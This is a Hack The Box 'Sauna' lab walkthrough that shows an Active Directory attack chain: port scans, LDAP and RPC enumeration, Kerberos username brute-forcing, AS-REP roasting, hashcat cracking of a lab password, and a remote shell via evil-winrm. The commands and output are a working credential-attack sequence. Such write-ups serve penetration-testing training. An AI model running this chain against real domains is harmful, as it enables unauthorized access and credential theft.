HTB - Sauna

20 minute read

Nmap Scan

Lets perform a nmap scan on the target machine,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 01:34 EDT
Nmap scan report for 10.10.10.175
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-28 12:39:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m09s
| smb2-time: 
|   date: 2022-03-28T12:39:35
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.16 seconds

Seems like it is an active directory envionment, lets scan for other services too

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 01:38 EDT
Nmap scan report for 10.10.10.175
Host is up (0.29s latency).
Not shown: 9986 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman
9389/tcp open  adws

Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds

There are other services running too

Enumeration

From the nmap scan we can conclude that, the domain name of the AD is EGOTISTICAL-BANK.LOCAL0

And it has 53/tcp open domain and 389/tcp open ldap from which we can conclude that, this machine is a Domain Controller

We also have 5985/tcp open wsman running, from which we can say that PS-Remoting is enabled in this AD

Enumerating SMB

From the SMB script scan of nmap,

| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

We cannot performing relaying attacks to gain initial access since SMB signing is enabled and required

Trying anonymous login over SMB,

┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.175 -u monish -p fake
[!] Authentication error on 10.10.10.175
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.175                  
[+] IP: 10.10.10.175:445        Name: 10.10.10.175                                      
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ smbclient -L //10.10.10.175 -N 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

SMB requires authentication to access resources

Enumeration RPC

We can enumerate RCP using null/no pass login,

┌──(kaliaidenpearce369)-[~]
└─$ rpcclient 10.10.10.175 -U "" -N
rpcclient $> help

...

We have access over RPC, so we can use RPC commands to enumerate passively the AD domain

Enumerating the AD domain,

rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED

This fails because we dont have enough privilege for our authorization over RPC

If we have valid credentials of this domain user, we can use that to query it

Enumerating LDAP

Lets use ldapsearch to perform basic queries to enumerate the domain

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
ldapServiceName: EGOTISTICAL-BANK.LOCAL:sauna$@EGOTISTICAL-BANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK
 ,DC=LOCAL
serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configu
 ration,DC=EGOTISTICAL-BANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 98378
dsServiceName: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
dnsHostName: SAUNA.EGOTISTICAL-BANK.LOCAL
defaultNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL
currentTime: 20220328131302.0Z
configurationNamingContext: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
                         

Getting the root domain info,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x -s base rootDomainNamingContext 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: rootDomainNamingContext 
#

#
dn:
rootDomainNamingContext: DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Getting all naming contexts to query the LDAP,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Querying with DC=EGOTISTICAL-BANK,DC=LOCAL,

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x  -b "DC=egotistical-bank,DC=local" 
# extended LDIF
#
# LDAPv3
# base <DC=egotistical-bank,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# EGOTISTICAL-BANK.LOCAL
dn: DC=EGOTISTICAL-BANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
instanceType: 5
whenCreated: 20200123054425.0Z
whenChanged: 20220328123305.0Z
subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAQL7gs8Yl7ESyuZ/4XESy7A==
uSNChanged: 98336
name: EGOTISTICAL-BANK
objectGUID:: 7AZOUMEioUOTwM9IB/gzYw==
replUpToDateVector:: AgAAAAAAAAAGAAAAAAAAAEbG/1RIhXVKvwnC1AVq4o8WgAEAAAAAAAA8U
 hgDAAAAq4zveNFJhUSywu2cZf6vrQzgAAAAAAAAKDj+FgMAAADc0VSB8WEuQrRECkAJ5oR1FXABAA
 AAAADUbg8XAwAAAP1ahZJG3l5BqlZuakAj9gwL0AAAAAAAANDwChUDAAAAm/DFn2wdfEWLFfovGj4
 TThRgAQAAAAAAENUAFwMAAABAvuCzxiXsRLK5n/hcRLLsCbAAAAAAAADUBFIUAwAAAA==
creationTime: 132929443854949217
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
nextRid: 1000
pwdProperties: 1
pwdHistoryLength: 24
objectSid:: AQQAAAAAAAUVAAAA+o7VsIowlbg+rLZG
serverState: 1
uASCompat: 1
modifiedCount: 1
auditingPolicy:: AAE=
nTMixedDomain: 0
rIDManagerReference: CN=RID Manager$,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
fSMORoleOwner: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name
 ,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
systemFlags: -1946157056
wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOT
 ISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Progra
 m Data,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGO
 TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrin
 cipals,DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=
 EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=E
 GOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGO
 TISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTIC
 AL-BANK,DC=LOCAL
wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,
 DC=EGOTISTICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTIS
 TICAL-BANK,DC=LOCAL
wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICA
 L-BANK,DC=LOCAL
objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,D
 C=LOCAL
isCriticalSystemObject: TRUE
gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=Syste
 m,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
dSCorePropagationData: 16010101000000.0Z
otherWellKnownObjects: B:32:683A24E2E8164BD3AF86AC3C2CF3F981:CN=Keys,DC=EGOTIS
 TICAL-BANK,DC=LOCAL
otherWellKnownObjects: B:32:1EB93889E40C45DF9F0C64D23BBB6237:CN=Managed Servic
 e Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
ms-DS-MachineAccountQuota: 10
msDS-Behavior-Version: 7
msDS-PerUserTrustQuota: 1
msDS-AllUsersTrustQuota: 1000
msDS-PerUserTrustTombstonesQuota: 10
msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Na
 me,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-N
 ame,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
msDS-NcType: 0
msDS-ExpirePasswordsOnSmartCardOnlyAccounts: TRUE
dc: EGOTISTICAL-BANK

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL

# Computers, EGOTISTICAL-BANK.LOCAL
dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL

# Domain Controllers, EGOTISTICAL-BANK.LOCAL
dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL

# System, EGOTISTICAL-BANK.LOCAL
dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL

# LostAndFound, EGOTISTICAL-BANK.LOCAL
dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL

# Infrastructure, EGOTISTICAL-BANK.LOCAL
dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL

# ForeignSecurityPrincipals, EGOTISTICAL-BANK.LOCAL
dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL

# Program Data, EGOTISTICAL-BANK.LOCAL
dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL

# NTDS Quotas, EGOTISTICAL-BANK.LOCAL
dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL

# Managed Service Accounts, EGOTISTICAL-BANK.LOCAL
dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL

# Keys, EGOTISTICAL-BANK.LOCAL
dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL

# TPM Devices, EGOTISTICAL-BANK.LOCAL
dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL

# Builtin, EGOTISTICAL-BANK.LOCAL
dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

# search reference
ref: ldap://ForestDnsZones.EGOTISTICAL-BANK.LOCAL/DC=ForestDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL

# search reference
ref: ldap://DomainDnsZones.EGOTISTICAL-BANK.LOCAL/DC=DomainDnsZones,DC=EGOTIST
 ICAL-BANK,DC=LOCAL

# search reference
ref: ldap://EGOTISTICAL-BANK.LOCAL/CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOC
 AL

# search result
search: 2
result: 0 Success

# numResponses: 19
# numEntries: 15
# numReferences: 3

This one seems different,

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

Now querying with CN=users,DC=egotistical-bank,DC=local

┌──(kaliaidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.175 -x  -b "CN=users,DC=egotistical-bank,DC=local"
# extended LDIF
#
# LDAPv3
# base <CN=users,DC=egotistical-bank,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# Users, EGOTISTICAL-BANK.LOCAL
dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Not much information to proceed, we still do not know the users inside this domain

Enumerating Web Service

From the nmap script scan we got this as the result for http 80,

80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE

This is how the web page looks,

And further scrolling, we have an email submitting form where we can try phishing for initial access

Even though if we send it, we cannot get the NTLM hashes on our responder since SMB signing is enabled

And in about page, we can see the employee names which we can try for potential brueforcing

Creating a wordlist for usernames,

┌──(kaliaidenpearce369)-[~]
└─$ nano sauna-users.txt        
                                                                                 
┌──(kaliaidenpearce369)-[~]
└─$ cat sauna-users.txt          
fergus.smith
smith.fergus
f.smith
smith.f
fsmith
smithf
s.fergus
fergus.s
sfergus
ferguss
shaun.coins
coins.shaun
shaun.c
c.shaun
shaunc
cshaun
coins.s
s.coins
coinss
scoins
sophie.driver
driver.sophie
sophie.d
d.sophie
sophied
dsophie
driver.s
s.driver
sdriver
drviers
bowie.taylor
taylor.bowie
bowie.t
t.bowie
bowiet
tbowie
taylor.b
b.taylor
btaylor
taylorb
hugo.bear
bear.hugo
bear.h
h.bear
hbear
bearh
hugo.b
b.hugo
hugob
bhugo
steven.kerb
kerb.steven
steven.k
k.steven
stevenk
ksteven
kerb.s
s.kerb
kerbs
skerb

Enumerating Kerberos

From the nmap scan we have,

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-28 12:39:12Z)

Lets try bruteforcing the kerberos to find valid usernames with kerbrute,

┌──(kaliaidenpearce369)-[~]
└─$ kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL sauna-users.txt --dc 10.10.10.175

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 03/28/22 - Ronnie Flathers @ropnop

2022/03/28 02:51:25 >  Using KDC(s):
2022/03/28 02:51:25 >   10.10.10.175:88

2022/03/28 02:51:31 >  [+] VALID USERNAME:       fsmith@EGOTISTICAL-BANK.LOCAL
2022/03/28 02:51:33 >  Done! Tested 60 usernames (1 valid) in 7.217 seconds

So fsmith is a valid username in the domain EGOTISTICAL-BANK.LOCAL

Initial Access

Lets try impacket tools to perform some kerberos attacks on the domain,

Lets try to grab some AD users, probably it should fail since we couldn’t query it using LDAP

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetADUsers egotistical-bank.local/  -dc-ip 10.10.10.175 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying 10.10.10.175 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------

Lets use impacket-GetNPUsers to get TGT if DONT_REQUIRE_PREAUTH is set to the UAC flag of the user

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers egotistical-bank.local/fsmith -no-pass  -dc-ip 10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5011bb17971f25a63756ac1d2a$e56b731631b9749da7556bc103b8c5e525eef18e806ca299db0b2b235d6137293d11a4b86ffa06909bf4d4393a311a6a2d683098f675ce59551d7f8fb0107eee6b11959c82142523234523c95b26b1b8e4c0db5ee14387496c58ffe3cb1e00fdf9252388b3e69094244945cb5b08f2f3e5c9bc04167fc693af1285e24a727f95d689f1729bf346e68460902ba6ae08d2ce1e5b3b971f0fab921207313b0adf63a1714017a622e98f6013877751542d191fad0a3f7ebc4ece804e99eec831c5ad7c1b6bc01eb813a5d7312878ecb3037a5911c208a1e1a5aa4498e85b84399fadf77302ffdbe33eb161d1cac571b1edadf630ef3d4c500a14a8aec71407878c92

Seems like the user fsmith is vulnerable to ASREP-Roasting

Lets crack the TGT using hashcat,

┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -m 18200 '$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5011bb17971f25a63756ac1d2a$e56b731631b9749da7556bc103b8c5e525eef18e806ca299db0b2b235d6137293d11a4b86ffa06909bf4d4393a311a6a2d683098f675ce59551d7f8fb0107eee6b11959c82142523234523c95b26b1b8e4c0db5ee14387496c58ffe3cb1e00fdf9252388b3e69094244945cb5b08f2f3e5c9bc04167fc693af1285e24a727f95d689f1729bf346e68460902ba6ae08d2ce1e5b3b971f0fab921207313b0adf63a1714017a622e98f6013877751542d191fad0a3f7ebc4ece804e99eec831c5ad7c1b6bc01eb813a5d7312878ecb3037a5911c208a1e1a5aa4498e85b84399fadf77302ffdbe33eb161d1cac571b1edadf630ef3d4c500a14a8aec71407878c92' /opt/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5011bb17971f25a63756ac1d2a$e56b731631b9749da7556bc103b8c5e525eef18e806ca299db0b2b235d6137293d11a4b86ffa06909bf4d4393a311a6a2d683098f675ce59551d7f8fb0107eee6b11959c82142523234523c95b26b1b8e4c0db5ee14387496c58ffe3cb1e00fdf9252388b3e69094244945cb5b08f2f3e5c9bc04167fc693af1285e24a727f95d689f1729bf346e68460902ba6ae08d2ce1e5b3b971f0fab921207313b0adf63a1714017a622e98f6013877751542d191fad0a3f7ebc4ece804e99eec831c5ad7c1b6bc01eb813a5d7312878ecb3037a5911c208a1e1a5aa4498e85b84399fadf77302ffdbe33eb161d1cac571b1edadf630ef3d4c500a14a8aec71407878c92:Thestrokes23
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5...878c92
Time.Started.....: Mon Mar 28 12:30:12 2022 (0 secs)
Time.Estimated...: Mon Mar 28 12:30:12 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14487.9 kH/s (4.82ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 59c Util: 33% Core:2032MHz Mem:6000MHz Bus:4

Started: Mon Mar 28 12:30:10 2022
Stopped: Mon Mar 28 12:30:13 2022

The password for the user fsmith is Thestrokes23

Now lets try to list all ASREP-Roastable users,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers egotistical-bank.local/fsmith:Thestrokes23  -dc-ip 10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Name    MemberOf                                                            PasswordLastSet             LastLogon                   UAC      
------  ------------------------------------------------------------------  --------------------------  --------------------------  --------
FSmith  CN=Remote Management Users,CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL  2020-01-23 11:45:19.047096  2022-03-28 10:02:50.823048  0x410200 

None other than fsmith

Now lets use fsmith credentials to spawn shell by evil-winrm,

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175                                

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> hostname
SAUNA

Getting the secrets,

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> more user.txt
<USER FLAG>

Privilege Enumeration

Checking for privileges assigned to our user,

*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Checking the group membership of our user,

*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
